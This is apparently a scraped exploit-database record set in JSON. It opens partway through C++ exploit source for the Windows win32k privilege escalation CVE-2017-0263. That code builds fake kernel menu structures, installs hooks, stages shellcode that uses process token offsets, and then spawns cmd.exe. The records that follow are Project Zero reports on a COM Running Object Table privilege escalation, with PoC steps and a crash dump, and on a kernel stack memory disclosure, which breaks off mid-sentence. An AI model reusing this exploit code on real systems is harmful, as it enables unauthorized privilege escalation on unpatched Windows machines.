WPARAM wParam,\r\n _In_ LPARAM lParam\r\n)\r\n{\r\n if (msg != WM_NCDESTROY || bDoneExploit)\r\n {\r\n return DefWindowProcW(hwnd, msg, wParam, lParam);\r\n }\r\n std::cout << \"::\" << __FUNCTION__ << std::endl;\r\n POCDEBUG_BREAK();\r\n DWORD dwPopupFake[0xD] = { 0 };\r\n dwPopupFake[0x0] = (DWORD)0x00098208; //->flags\r\n dwPopupFake[0x1] = (DWORD)pvHeadFake; //->spwndNotify\r\n dwPopupFake[0x2] = (DWORD)pvHeadFake; //->spwndPopupMenu\r\n dwPopupFake[0x3] = (DWORD)pvHeadFake; //->spwndNextPopup\r\n dwPopupFake[0x4] = (DWORD)pvAddrFlags - 4; //->spwndPrevPopup\r\n dwPopupFake[0x5] = (DWORD)pvHeadFake; //->spmenu\r\n dwPopupFake[0x6] = (DWORD)pvHeadFake; //->spmenuAlternate\r\n dwPopupFake[0x7] = (DWORD)pvHeadFake; //->spwndActivePopup\r\n dwPopupFake[0x8] = (DWORD)0xFFFFFFFF; //->ppopupmenuRoot\r\n dwPopupFake[0x9] = (DWORD)pvHeadFake; //->ppmDelayedFree\r\n dwPopupFake[0xA] = (DWORD)0xFFFFFFFF; //->posSelectedItem\r\n dwPopupFake[0xB] = (DWORD)pvHeadFake; //->posDropped\r\n dwPopupFake[0xC] = (DWORD)0;\r\n for (UINT i = 0; i < iWindowCount; ++i)\r\n {\r\n SetClassLongW(hWindowList[i], GCL_MENUNAME, (LONG)dwPopupFake);\r\n }\r\n xxSyscall(num_NtUserMNDragLeave, 0, 0);\r\n LRESULT Triggered = SendMessageW(hWindowHunt, 0x9F9F, popupMenuRoot, 0);\r\n bDoneExploit = Triggered == 0x9F9F;\r\n return DefWindowProcW(hwnd, msg, wParam, lParam);\r\n}\r\n \r\n#define MENUCLASS_NAME L\"#32768\"\r\n \r\nstatic\r\nLRESULT\r\nCALLBACK\r\nxxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)\r\n{\r\n tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;\r\n static HWND hwndMenuHit = 0;\r\n static UINT iShadowCount = 0;\r\n \r\n if (bDoneExploit || iMenuCreated != num_PopupMenuCount - 2 || cwp->message != WM_NCCREATE)\r\n {\r\n return CallNextHookEx(0, code, wParam, lParam);\r\n }\r\n std::cout << \"::\" << __FUNCTION__ << std::endl;\r\n WCHAR szTemp[0x20] = { 0 };\r\n GetClassNameW(cwp->hwnd, szTemp, 0x14);\r\n if (!wcscmp(szTemp, L\"SysShadow\") && hwndMenuHit != NULL)\r\n {\r\n std::cout << \"::iShadowCount=\" << iShadowCount << std::endl;\r\n POCDEBUG_BREAK();\r\n if (++iShadowCount == num_WndShadowCount)\r\n {\r\n SetWindowLongW(cwp->hwnd, GWL_WNDPROC, (LONG)xxShadowWindowProc);\r\n }\r\n else\r\n {\r\n SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW);\r\n SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW);\r\n }\r\n }\r\n else if (!wcscmp(szTemp, MENUCLASS_NAME))\r\n {\r\n hwndMenuHit = cwp->hwnd;\r\n std::cout << \"::hwndMenuHit=\" << hwndMenuHit << std::endl;\r\n }\r\n return CallNextHookEx(0, code, wParam, lParam);\r\n}\r\n \r\n#define MN_ENDMENU 0x1F3\r\n \r\nstatic\r\nVOID\r\nCALLBACK\r\nxxWindowEventProc(\r\n HWINEVENTHOOK hWinEventHook,\r\n DWORD event,\r\n HWND hwnd,\r\n LONG idObject,\r\n LONG idChild,\r\n DWORD idEventThread,\r\n DWORD dwmsEventTime\r\n)\r\n{\r\n UNREFERENCED_PARAMETER(hWinEventHook);\r\n UNREFERENCED_PARAMETER(event);\r\n UNREFERENCED_PARAMETER(idObject);\r\n UNREFERENCED_PARAMETER(idChild);\r\n UNREFERENCED_PARAMETER(idEventThread);\r\n UNREFERENCED_PARAMETER(dwmsEventTime);\r\n std::cout << \"::\" << __FUNCTION__ << std::endl;\r\n if (iMenuCreated == 0)\r\n {\r\n popupMenuRoot = *(DWORD *)((PBYTE)xxHMValidateHandle(hwnd) + 0xb0);\r\n }\r\n if (++iMenuCreated >= num_PopupMenuCount)\r\n {\r\n std::cout << \">>SendMessage(MN_ENDMENU)\" << std::endl;\r\n POCDEBUG_BREAK();\r\n SendMessageW(hwnd, MN_ENDMENU, 0, 0);\r\n }\r\n else\r\n {\r\n std::cout << \">>SendMessage(WM_LBUTTONDOWN)\" << std::endl;\r\n POCDEBUG_BREAK();\r\n SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002);\r\n }\r\n}\r\n \r\nstatic\r\nBOOL\r\nxxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra)\r\n{\r\n WNDCLASSEXW wndClass = { 0 };\r\n wndClass = { 0 };\r\n wndClass.cbSize = sizeof(WNDCLASSEXW);\r\n wndClass.lpfnWndProc = DefWindowProcW;\r\n wndClass.cbWndExtra = cbWndExtra;\r\n wndClass.hInstance = GetModuleHandleA(NULL);\r\n wndClass.lpszMenuName = NULL;\r\n wndClass.lpszClassName = lpszClassName;\r\n return RegisterClassExW(&wndClass);\r\n}\r\n \r\nstatic\r\nHWND\r\nxxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle)\r\n{\r\n return CreateWindowExW(dwExStyle,\r\n lpszClassName,\r\n NULL,\r\n dwStyle,\r\n 0,\r\n 0,\r\n 1,\r\n 1,\r\n NULL,\r\n NULL,\r\n GetModuleHandleA(NULL),\r\n NULL);\r\n}\r\n \r\nstatic\r\nVOID xxCreateCmdLineProcess(VOID)\r\n{\r\n STARTUPINFO si = { sizeof(si) };\r\n PROCESS_INFORMATION pi = { 0 };\r\n si.dwFlags = STARTF_USESHOWWINDOW;\r\n si.wShowWindow = SW_SHOW;\r\n WCHAR wzFilePath[MAX_PATH] = { L\"cmd.exe\" };\r\n BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);\r\n if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);\r\n}\r\n \r\nstatic\r\nDWORD\r\nWINAPI\r\nxxTrackExploitEx(LPVOID lpThreadParameter)\r\n{\r\n UNREFERENCED_PARAMETER(lpThreadParameter);\r\n std::cout << \"::\" << __FUNCTION__ << std::endl;\r\n POCDEBUG_BREAK();\r\n \r\n for (INT i = 0; i < num_PopupMenuCount; i++)\r\n {\r\n MENUINFO mi = { 0 };\r\n hpopupMenu[i] = CreatePopupMenu();\r\n mi.cbSize = sizeof(mi);\r\n mi.fMask = MIM_STYLE;\r\n mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP;\r\n SetMenuInfo(hpopupMenu[i], &mi);\r\n }\r\n for (INT i = 0; i < num_PopupMenuCount; i++)\r\n {\r\n LPCSTR szMenuItem = \"item\";\r\n AppendMenuA(hpopupMenu[i],\r\n MF_BYPOSITION | MF_POPUP,\r\n (i >= num_PopupMenuCount - 1) ? 0 : (UINT_PTR)hpopupMenu[i + 1],\r\n szMenuItem);\r\n }\r\n \r\n for (INT i = 0; i < 0x100; i++)\r\n {\r\n WNDCLASSEXW Class = { 0 };\r\n WCHAR szTemp[20] = { 0 };\r\n HWND hwnd = NULL;\r\n wsprintfW(szTemp, L\"%x-%d\", rand(), i);\r\n Class.cbSize = sizeof(WNDCLASSEXA);\r\n Class.lpfnWndProc = DefWindowProcW;\r\n Class.cbWndExtra = 0;\r\n Class.hInstance = GetModuleHandleA(NULL);\r\n Class.lpszMenuName = NULL;\r\n Class.lpszClassName = szTemp;\r\n if (!RegisterClassExW(&Class))\r\n {\r\n continue;\r\n }\r\n hwnd = CreateWindowExW(0, szTemp, NULL, WS_OVERLAPPED,\r\n 0,\r\n 0,\r\n 0,\r\n 0,\r\n NULL,\r\n NULL,\r\n GetModuleHandleA(NULL),\r\n NULL);\r\n if (hwnd == NULL)\r\n {\r\n continue;\r\n }\r\n hWindowList[iWindowCount++] = hwnd;\r\n }\r\n for (INT i = 0; i < iWindowCount; i++)\r\n {\r\n pvShellCode->tagCLS[i] = *(PVOID *)((PBYTE)xxHMValidateHandle(hWindowList[i]) + num_offset_WND_pcls);\r\n }\r\n \r\n DWORD fOldProtect = 0;\r\n VirtualProtect(pvShellCode, 0x1000, PAGE_EXECUTE_READ, &fOldProtect);\r\n \r\n xxRegisterWindowClassW(L\"WNDCLASSMAIN\", 0x000);\r\n hWindowMain = xxCreateWindowExW(L\"WNDCLASSMAIN\",\r\n WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,\r\n WS_VISIBLE);\r\n xxRegisterWindowClassW(L\"WNDCLASSHUNT\", 0x200);\r\n hWindowHunt = xxCreateWindowExW(L\"WNDCLASSHUNT\",\r\n WS_EX_LEFT,\r\n WS_OVERLAPPED);\r\n PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);\r\n PBYTE pbExtra = head->deskhead.pSelf + 0xb0 + 4;\r\n pvHeadFake = pbExtra + 0x44;\r\n for (UINT x = 0; x < 0x7F; x++)\r\n {\r\n SetWindowLongW(hWindowHunt, sizeof(DWORD) * (x + 1), (LONG)pbExtra);\r\n }\r\n PVOID pti = head->thread.pti;\r\n SetWindowLongW(hWindowHunt, 0x28, 0);\r\n SetWindowLongW(hWindowHunt, 0x50, (LONG)pti); // pti\r\n SetWindowLongW(hWindowHunt, 0x6C, 0);\r\n SetWindowLongW(hWindowHunt, 0x1F8, 0xC033C033);\r\n SetWindowLongW(hWindowHunt, 0x1FC, 0xFFFFFFFF);\r\n \r\n pvAddrFlags = *(PBYTE *)((PBYTE)xxHMValidateHandle(hWindowHunt) + 0x10) + 0x16;\r\n \r\n SetWindowLongW(hWindowHunt, GWL_WNDPROC, (LONG)pvShellCode->pfnWindProc);\r\n \r\n SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc,\r\n GetModuleHandleA(NULL),\r\n GetCurrentThreadId());\r\n \r\n SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART,\r\n GetModuleHandleA(NULL),\r\n xxWindowEventProc,\r\n GetCurrentProcessId(),\r\n GetCurrentThreadId(),\r\n 0);\r\n \r\n TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL);\r\n \r\n MSG msg = { 0 };\r\n while (GetMessageW(&msg, NULL, 0, 0))\r\n {\r\n TranslateMessage(&msg);\r\n DispatchMessageW(&msg);\r\n }\r\n return 0;\r\n}\r\n \r\nINT POC_CVE20170263(VOID)\r\n{\r\n std::cout << \"-------------------\" << std::endl;\r\n std::cout << \"POC - CVE-2017-0263\" << std::endl;\r\n std::cout << \"-------------------\" << std::endl;\r\n \r\n pvShellCode = (PSHELLCODE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n if (pvShellCode == NULL)\r\n {\r\n return 0;\r\n }\r\n ZeroMemory(pvShellCode, 0x1000);\r\n pvShellCode->pid = GetCurrentProcessId();\r\n pvShellCode->off_CLS_lpszMenuName = 0x050;\r\n pvShellCode->off_THREADINFO_ppi = 0x0b8;\r\n pvShellCode->off_EPROCESS_ActiveLink = 0x0b8;\r\n pvShellCode->off_EPROCESS_Token = 0x0f8;\r\n CopyMemory(pvShellCode->pfnWindProc, xxPayloadWindProc, sizeof(xxPayloadWindProc));\r\n \r\n std::cout << \"CREATE WORKER THREAD...\" << std::endl;\r\n POCDEBUG_BREAK();\r\n HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL);\r\n if (hThread == NULL)\r\n {\r\n return FALSE;\r\n }\r\n while (!bDoneExploit)\r\n {\r\n Sleep(500);\r\n }\r\n xxCreateCmdLineProcess();\r\n DestroyWindow(hWindowMain);\r\n TerminateThread(hThread, 0);\r\n std::cout << \"-------------------\" << std::endl;\r\n getchar();\r\n return bDoneExploit;\r\n}\r\n \r\nINT main(INT argc, CHAR *argv[])\r\n{\r\n POC_CVE20170263();\r\n return 0;\r\n}\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30198", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-05T05:13:31", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation Explo", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27797", "href": "https://0day.today/exploit/description/27797", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n \r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. This can be abused to elevate privileges.\r\n \r\nDescription:\r\n \r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n \r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n \r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n \r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n \r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n \r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n \r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no was of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n \r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n \r\nCrash Dump:\r\n \r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n \r\nExpected Result:\r\nNot doing what ever it did.\r\n \r\nObserved Result:\r\nIt did it!\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27797", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T04:59:07", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 Kernel - win32k!xxxClientLpkDrawTextEx Stack Memory Disclosure Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0245"], "modified": "2017-05-16T00:00:00", "id": "1337DAY-ID-27775", "href": "https://0day.today/exploit/description/27775", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1182\r\n \r\nWe have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other platforms untested) indirectly through the win32k!NtUserCreateWindowEx system call. The analysis shown below was performed on Windows 7 32-bit.\r\n \r\nThe full stack trace of where uninitialized kernel stack data is leaked to user-mode is as follows:\r\n \r\n--- cut ---\r\n8a993e28 82ab667d nt!memcpy+0x35\r\n8a993e84 92c50063 nt!KeUserModeCallback+0xc6\r\n8a994188 92c5f436 win32k!xxxClientLpkDrawTextEx+0x16b\r\n8a9941f4 92c5f72e win32k!DT_GetExtentMinusPrefixes+0x91\r\n8a994230 92c5f814 win32k!NeedsEndEllipsis+0x3d\r\n8a99437c 92c5fa0f win32k!AddEllipsisAndDrawLine+0x56\r\n8a994404 92c5fa9b win32k!DrawTextExWorker+0x140\r\n8a994428 92bb8c65 win32k!DrawTextExW+0x1e\r\n8a9946f0 92b23702 win32k!xxxDrawCaptionTemp+0x54d\r\n8a994778 92b78ce8 win32k!xxxDrawCaptionBar+0x682\r\n8a99479c 92b8067f win32k!xxxDWP_DoNCActivate+0xd6\r\n8a994818 92b59c8d win32k!xxxRealDefWindowProc+0x7fe\r\n8a99483c 92b86c1c win32k!xxxDefWindowProc+0x10f\r\n8a994874 92b8c156 win32k!xxxSendMessageToClient+0x11b\r\n8a9948c0 92b8c205 win32k!xxxSendMessageTimeout+0x1cf\r\n8a9948e8 92b719b5 win32k!xxxSendMessage+0x28\r\n8a994960 92b4284b win32k!xxxActivateThisWindow+0x473\r\n8a9949c8 92b42431 win32k!xxxSetForegroundWindow2+0x3dd\r\n8a994a08 92b714c7 win32k!xxxSetForegroundWindow+0x1e4\r\n8a994a34 92b712d7 win32k!xxxActivateWindow+0x1b3\r\n8a994a48 92b70cd6 win32k!xxxSwpActivate+0x44\r\n8a994aa8 92b70f83 win32k!xxxEndDeferWindowPosEx+0x2b5\r\n8a994ac8 92b7504f win32k!xxxSetWindowPos+0xf6\r\n8a994b04 92b6f6dc win32k!xxxShowWindow+0x25a\r\n8a994c30 92b72da9 win32k!xxxCreateWindowEx+0x137b\r\n8a994cf0 82876db6 win32k!NtUserCreateWindowEx+0x2a8\r\n8a994cf0 77486c74 nt!KiSystemServicePostCall\r\n0022f9f8 770deb5c ntdll!KiFastSystemCallRet\r\n0022f9fc 770deaf0 USER32!NtUserCreateWindowEx+0xc\r\n0022fca0 770dec1c USER32!VerNtUserCreateWindowEx+0x1a3\r\n0022fd4c 770dec77 USER32!_CreateWindowEx+0x201\r\n0022fd88 004146a5 USER32!CreateWindowExW+0x33\r\n--- cut ---\r\n \r\nThe win32k!xxxClientLpkDrawTextEx function invokes a user-mode callback #69 (corresponding to user32!__ClientLpkDrawTextEx), and passes in an input structure of 0x98 bytes. We have found that 4 bytes at offset 0x64 of that structure are uninitialized. These bytes come from offset 0x2C of a smaller structure of size 0x3C, which is passed to win32k!xxxClientLpkDrawTextEx through the 8th parameter. We have tracked that this smaller structure originates from the stack frame of the win32k!DrawTextExWorker function, and is passed down to win32k!DT_InitDrawTextInfo in the 4th argument.\r\n \r\nThe uninitialized data can be obtained by a user-mode application by hooking the appropriate entry in the user32.dll callback dispatch table, and reading data from a pointer provided through the handler's parameter. This technique is illustrated by the attached proof-of-concept code (again, specific to Windows 7 32-bit). During a few quick attempts, we have been unable to control the leaked bytes with stack spraying techniques, or to get them to contain any meaningful values for the purpose of vulnerability demonstration. However, if we attach a WinDbg debugger to the tested system, we can set a breakpoint at the beginning of win32k!DrawTextExWorker, manually overwrite the 4 bytes in question to a controlled DWORD right after the stack frame allocation instructions, and then observe these bytes in the output of the PoC program, which indicates they were not initialized anywhere during execution between win32k!DrawTextExWorker and nt!KeUserModeCallback(), and copied in the leftover form to user-mode. See below:\r\n \r\n--- cut ---\r\n2: kd> ba e 1 win32k!DrawTextExWorker\r\n2: kd> g\r\nBreakpoint 0 hit\r\nwin32k!DrawTextExWorker:\r\n8122f8cf 8bff mov edi,edi\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0x2:\r\n8122f8d1 55 push ebp\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0x3:\r\n8122f8d2 8bec mov ebp,esp\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0x5:\r\n8122f8d4 8b450c mov eax,dword ptr [ebp+0Ch]\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0x8:\r\n8122f8d7 83ec58 sub esp,58h\r\n3: kd> p\r\nwin32k!DrawTextExWorker+0xb:\r\n8122f8da 53 push ebx\r\n3: kd> ed ebp-2c cccccccc\r\n3: kd> g\r\nBreakpoint 0 hit\r\nwin32k!DrawTextExWorker:\r\n8122f8cf 8bff mov edi,edi\r\n3: kd> g\r\n--- cut ---\r\n \r\nHere, a 32-bit value at EBP-0x2C is overwritten with 0xCCCCCCCC. This is the address of the uninitialized memory, since it is located at offset 0x2C of a structure placed at EBP-0x58; EBP-0x58+0x2C = EBP-0x2C. After executing the above commands, the program should print output similar to the following:\r\n \r\n--- cut ---\r\n00000000: 98 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00 ................\r\n00000010: 7c 00 00 00 00 00 00 00 14 00 16 00 80 00 00 00 |...............\r\n00000020: a4 02 01 0e 00 00 00 00 00 00 00 00 0a 00 00 00 ................\r\n00000030: 00 00 00 00 24 88 00 00 18 00 00 00 04 00 00 00 ....$...........\r\n00000040: 36 00 00 00 16 00 00 00 30 00 00 00 01 00 00 00 6.......0.......\r\n00000050: 01 00 00 00 0d 00 00 00 1e 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00[cc cc cc cc]00 00 00 00 04 00 00 00 ................\r\n00000070: ff ff ff ff 01 00 00 00 ff ff ff ff 1c 00 00 00 ................\r\n00000080: 54 00 65 00 73 00 74 00 57 00 69 00 6e 00 64 00 T.e.s.t.W.i.n.d.\r\n00000090: 6f 00 77 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? o.w.............\r\n--- cut ---\r\n \r\nIt's clearly visible that bytes at offsets 0x64-0x67 are equal to the data we set in the 